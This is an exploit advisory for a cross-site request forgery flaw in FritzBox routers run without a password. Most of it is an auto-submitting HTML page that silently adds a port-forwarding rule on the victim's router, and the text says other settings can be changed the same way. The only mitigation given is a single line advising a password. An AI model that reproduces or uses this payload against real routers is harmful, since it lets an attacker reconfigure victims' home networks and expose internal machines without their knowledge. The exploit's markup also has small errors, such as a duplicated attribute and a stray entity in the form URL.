######################################

Exploitation: Remote with browser

Exploit: Available

Impact: Medium

Fix: N/A

######################################

####################

• Description:
  ####################
  Via XSRF change settings in FritzBox.

####################

• Vulnerability:
  ####################
  XSRF vulnerability, when you use the FritzBox without passwort login

####################

• example Exploit for Portforwarding:
  ####################
  <html>
  <body onLoad="javascript:document.form.submit()">
  <form action="http://www.fritz.box/cgi-bin/webcm&quot; method="POST" name="form">
  <input type="hidden" value="getpage" value="…/html/de/menus/menu2.html">
  <input type="hidden" name="errorpage" value="…/html/de/menus/menu2.html">
  <input type="hidden" name="var:lang" value="de">
  <input type="hidden" name="var:pagename" value="portfw">
  <input type="hidden" name="var:errorpagename" value="portrule">
  <input type="hidden" name="var:menu" value="internet">
  <input type="hidden" name="var:pagemaster" value="">
  <input type="hidden" name="var:rule" value="rule3">
  <input type="hidden" name="var:isnew" value="1">
  <input type="hidden" name="var:isexp" value="0">
  <input type="hidden" name="forwardrules:settings/rule3/activated" value="1">
  <input type="hidden" name="forwardrules:settings/rule3/description" value="HTTP-Server">
  <input type="hidden" name="forwardrules:settings/rule3/protocol" value="TCP">
  <input type="hidden" name="forwardrules:settings/rule3/port" value="80">
  <input type="hidden" name="forwardrules:settings/rule3/endport" value="80">
  <input type="hidden" name="forwardrules:settings/rule3/fwip" value="192.168.178.24">
  <input type="hidden" name="forwardrules:settings/rule3/fwport" value="80">
  </form>
  </body>
  </html>

(this is only a example code for portforwarding for other things they are other variables!!!)

####################

• Solution:
  ####################
  Use FritzBox only with passwort

thx to skskilL & NBBN